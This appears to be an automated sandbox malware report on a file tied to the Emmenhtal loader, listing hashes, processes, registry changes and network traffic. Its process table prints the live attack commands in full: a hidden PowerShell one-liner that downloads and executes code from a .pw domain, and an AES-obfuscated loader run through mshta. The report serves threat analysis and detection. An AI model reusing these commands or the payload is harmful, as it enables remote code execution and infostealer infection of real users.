| File name: | singl5.mp4.txt |
| Full analysis: | https://app.any.run/tasks/a545b2ec-7859-4d2a-824f-4f768d3e3512 |
| Verdict: | Malicious activity |
| Threats: | First identified in 2024, Emmenhtal operates by embedding itself within modified legitimate Windows binaries, often using HTA (HTML Application) files to execute malicious scripts. It has been linked to the distribution of malware such as CryptBot and Lumma Stealer. Emmenhtal is typically disseminated through phishing campaigns, including fake video downloads and deceptive email attachments. |
| Analysis date: | December 24, 2024, 03:29:07 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | data |
| MD5: | 3B40FC416A2AB37AD37304252EC94EC1 |
| SHA1: | 5ABA4DEDFC69AB454AA4504C4705776E0D0151E0 |
| SHA256: | 5F4F3E5752B7555DCA6C9FE9308C63B4543F486F4AEE5E4FA5126A5E6C0BCFF8 |
| SSDEEP: | 12288:uuqhjQGdOnIVMQGdOnIV6dGdOnIVOSPdOnIV7BHvQpdOnIVQ/x2dO6IVguGdOsIK:beQtQXdbSZBHvQY/xGuAnIBHY+0ZHvQm |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1356 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2192 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2972 | C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | C:\Windows\System32\rundll32.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3640 | "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://rcsn.liveview.pw/singl5.pptx'))" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6312 | "C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\singl5.mp4.txt | C:\Windows\System32\notepad.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6792 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7004 | "C:\Windows\SysWOW64\mshta.exe" "C:\Users\admin\AppData\Local\Temp\singl5.mp4.txt.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | C:\Windows\SysWOW64\mshta.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7116 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function JJnwQ($UifP){return -split ($UifP -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$zviQ = JJnwQ('D28EB4390033A6779D03E77943E5D13598737E64216B1D9F221BA02F12C1780145927FF3260547D19A1273E45741E79B08A10982121E79421EE111A8D14F54F5B96A3091EFCFF5343385CC2C373BA49A474BEA00738ED137B5D31182E28F2B2640AEDDB9C0D35D69E34AC4C60B0E3511BA336137124645C102AD4740C3B00ED40C21E6F8F95768EF128B199E20E8DC80EB8B8291775BD94C9E1B47D57AFFF4E883C570A76DD14650732FFC0BA0884CECB8E10C4BCB98B9A512256884EED0A513946EF6C5FDCF0FEAD0D65076B1E76BE3F578B1CDC2D454FA1187CEB3755A48043EA49939A16FDD08D1405E48BFDD656012A4EC43E2C7847149AA0173267756FFF2139E72EE3C27FD7556A595D01BB99DC8CB2D3AC0A24ED30DE88E42B6E484D27AD56401E0179C35D96C1B91090FCDA1F7715F734FF1824B3DC82861C14D03456847BD9D305CD782DED5D9C353B71BA730B78494CB76FF0F0115395390CABFA3A4590160B5AAE29412EA885F65E474270A1055C23DDACE14C0A3633AB150755753268302DB73EF23A86736C0A95C1D40CFC7E2BC3630960359E93D2285CA37ADF81B062A78701AC9D29A0C80B12A9C00A271D20FB4394935F57F0C40EB72B6886A99211B88CA9E9A07BF86270BD8BA764DD3F0CA8431B4343FC20221EAE5D6718EE3B554A137F7D9C330F289F14AB58862DD7EF73DA744E8A851153C80173C1881F350D40EEE271705D53DE848F47D09F46BDD250EE3CDFF310EF95A940009F8C36ADE13AD268C24BCE00BFDB5702718D0B860F8BC31FE23F0C6F3DB7B7564680C1B4C5EBA1A096AF892492364F84A25AAE0E88D5FA390602C93E8CD5A9B25AD9DB98B454E367F8175C99AB12BF763028DE8876AA681EFB7250FFF9CF8423CFA2E0420603534396B31E751ECD3B37C9BD07329049F8E184C799EDB4A55274CFBF306950EA04C7A00C0C4B9305382967AD4262A57188AA7E1F95D0447AF708BE77A6169E45922CE06377303CD9AC5DDD6090EE9CAAB025B240A190133F7D1DD75741634C2D4AA67B9CBFD0EAADA47289A9AEEF8EC4151ABF4C45B7828C2CF9DD42F2718314D54D24979DAAB6DF9CAD01F8AB1BE12580296BC5B8895C923F5E5940AB97DAE7683C8ADF4A00E845F1E958EED5B20F93418AC3AF2D55A471BE92067590EE86B1928CFFBA538EBA2CCE2CA5986229849AFC326E0989A876DB4E82935CDAF25BAAB53B0575286E2AA8C33E250C2AD25C9897A1863E5A0D20CBD5BD20371DE34EB18D837CFB691940C895DA8F9032F6F357F18A3D7EDD8AD1F0A6099F23E61B900CFBE2843F4AA330766DED0BE9E1FDDA2C5422AC337E29B1044B7D53BF7F63BAC8FB43516973214F7199C4AB5DE19C613BFA5D4660441E1BD1661DCC7C8220E8CFE856B968F126EC2494ED418438FBF9B52054A62BB3B07D7D27D7EFE5AB179613C4B0E8896E87DD26C05904749E6077A58CA5260541B256A7F50F7CC9BA146BC21FE542478084057E16483E3065CD4581DD3969EB0A13F363EFE49394066D8D8FF555B1105044DACEA79E4DB6934EA2626CF58A7B006ECC81A9AD27EF129366C53218EA1E46ADEA978407EE439AB4B2E22972A6798150E975085C027E2CB593C30A62BC1508B13C7854BCDC1820C9CB6E5528B0D990A0223A5DC2B2AC2E5CDEF0F6E150257A42D74A540822B599E7D562DA84718ED4580D53772681319FF1B19CFCA25C466AE7830A8DF0BB6E3745B7DE9D27C1CA54BADED4E359C4198736FD82B4F56D4122C0404ACEFBB1612A05A4A73E4F87CFD869DFD930967C2484DB80009611329B0101765744C065FAE62E4EB3C57D77D26817C58BFF4B37C75D492ED1BF9E049F49080867835B2CDC10C79BF5E810409F7CACC1A4D8F2EEB51C86E41781BF357776920710164AC7D8A61EEC40E2357D58FCF761A912749DF20AB111953C285D31A1128B3D5D17964341A2DC38B1F43ECA210A3EDBBC22CE9EF7236B88C06F921CD688B773344739349E5F6C8BCA53BB763F1FC91550BC4E4479773F90F6773D0E4BB43C48DD957D7F892CB8C69B5DB3511A0B2F4B575638D0E0C64A48A125FB0FD01025FC9CAF8E904B669FAC48000C402B663598EEDB2FFE9F9EA324E784859F9433D3A8054C6EF37E8AEC3C68592B2C9C2809040C48078DEC144F4461CF084B09614787F012615CC9D131385D387EB2D9358937DE9825B4E12C06E419AC4F5AB650B683FC5B54D5502A9CF8374D3D5E0E7CF134F3FE7AC3A862C71DCE4B46DBC0457CC42F71D464C93B34D8B402839D8E0805FF4CF2A14564E265B9A696D93184780C355D635189E2AA3C77D37771B658F60E7F57F56419162205EC0D135C531C4B7B704F30918A5203D472F594DA3A0555BC780E8CF60');$tdeFo=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((JJnwQ('53537065465A524658755565646A5758')),[byte[]]::new(16)).TransformFinalBlock($zviQ,0,$zviQ.Length)); & $tdeFo.Substring(0,3) $tdeFo.Substring(129) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (7004) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (7004) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (7004) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (3640) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (3640) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (3640) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (3640) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (3640) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (3640) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (3640) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 7116 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:A7111E47BD0C31D823849A071978A9CD | SHA256:B039FB398B89F012E42439A8830A150E1F7999897FF39EE03A3DB08954D221BC | |||
| 7116 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0oadex31.ehc.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 3640 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ih4zwubc.0t2.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 3640 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8B8A832FCE2174C8FEE26B70F2483FBB | SHA256:0FBA3A37EF443507F533A7C3F31C0B5826EA416B95FDE43479E02D4E0C29400B | |||
| 7116 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_oiopsav5.cn1.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 3640 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_y5hlockt.vfd.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.209.214.100:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6592 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
6512 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | — | — | whitelisted |
— | — | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
6592 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 23.209.214.100:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4712 | MoUsoCoreWorker.exe | 2.19.11.120:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted |
— | — | 2.19.11.120:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted |
4712 | MoUsoCoreWorker.exe | 23.209.214.100:80 | www.microsoft.com | PT. Telekomunikasi Selular | ID | whitelisted |
— | — | 23.209.214.100:80 | www.microsoft.com | PT. Telekomunikasi Selular | ID | whitelisted |
5064 | SearchApp.exe | 2.23.209.140:443 | www.bing.com | Akamai International B.V. | GB | whitelisted |
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
login.live.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
r.bing.com |
| whitelisted |
fp.msedge.net |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2192 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.pw domain - Likely Hostile |